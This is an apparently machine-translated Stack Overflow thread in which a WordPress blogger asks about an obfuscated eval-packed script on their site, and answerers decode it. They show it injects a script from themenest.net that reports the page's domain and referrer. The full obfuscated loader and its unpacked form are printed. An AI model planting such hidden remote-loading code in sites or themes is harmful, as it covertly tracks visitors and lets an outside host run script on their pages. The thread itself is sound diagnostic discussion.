1. 首页
  2. 问答
  3. 这段代码在我的WordPress博客上做了什么?恶意软件?

这段代码在我的WordPress博客上做了什么?恶意软件?

2013-04-14 34 views
1

我发现下面的代码加载每次的网站加载,请回复我,它在我的博客?功能,这段代码在我的WordPress博客上做了什么?恶意软件?

themenest.net是url我看到,当我看到我的加载网站

<script type="text/javascript"> 
    eval(function (p, a, c, k, e, r) { 
     e = function (c) { 
      return c.toString(a) 
     }; 
     if (!''.replace(/^/, String)) { 
      while (c--) r[e(c)] = k[c] || e(c); 
      k = [function (e) { 
        return r[e] 
       } 
      ]; 
      e = function() { 
       return '\\w+' 
      }; 
      c = 1 
     }; 
     while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]); 
     return p 
    }('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');', 25, 25, 'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'), 0, {})); 
</script>

任何人都知道?

来源

2013-04-14 Manivasagam

+0

它去到提供WordPress的主题网站。所以我会猜测并说你已经下载了他们的主题,并且他们已经添加了这个代码。它可能是一些分析代码,可以让他们看到哪些域使用他们的主题。但我怀疑它是有害的 – dev

+0

如果以下答案中的任何一个回答您的问题,Stack Overflow的工作方式,您可以通过单击左侧的复选标记来“接受”答案。但只有当你考虑你的问题的答案。 –

回答

0

这有一些事情要做机智转介,跟踪和域名。它被打包,所以确切的代码不能被收回。只有当你解开它:

eval document.write('<scr'+'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></scr'+'ipt>');

来源

2013-04-14 11:55:11 Niels

+0

为什么-1,我的解释是exaclty te脚本做什么?跟踪推荐。 – Niels

0

看起来这是转诊和/或记录引荐域,你可以看到有

track|domain|r|encodeURIComponent|referrer

您将需要解压缩,看到真正的资源。

只需打开包装,你去那里:

<script type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></script>

我写上面,它只是记录你的域到themenest.net服务器。

我想所以找出版权滥用。

来源

2013-04-14 11:56:51 Michael

6

如果你打开它,代码:

document.write('<scr' + 'ipt type="text/javascript" src="http://themenest.net/platform/script/track?d=' + document.domain + '&r=' + encodeURIComponent(document.referrer) + '&c=' + Math.floor((Math.random() * 1000) + 1) + '"></scr' + 'ipt>');

...这检索来自http://themenest.net/platform/script/track信息传递关于它的文档,并且把你带到那个文件的引用链接脚本资源。我不知道脚本资源可能是什么(它可能什么都没有,只需要跟踪;查看浏览器的“网络”选项卡以查看返回的内容)。

这是否是某种恶意软件取决于您与themenest.net的关系。 :-)

来源

2013-04-14 11:58:07

1

该代码注入该脚本元素:

<script type="text/javascript" src="http://themenest.net/platform/script/track?d='+document.domain+'&r='+encodeURIComponent(document.referrer)+'&c='+Math.floor((Math.random()*1000)+1)+'"></script>

这是一个跟踪器,最有可能从themenest,检测其主题的跨用户的使用(您最初得到了主题的地方)。这很可能是他们的分析脚本。

脚本得到:

  • domain name(当前页面的域名,使用的主题网站)
  • referrer(你人在哪里抵达到包含脚本的网站页面之前)
  • 和使用的缓存清除机制加载最新版本的脚本,每次

来源

2013-04-14 11:59:45 Joseph

相关问题

 相关问题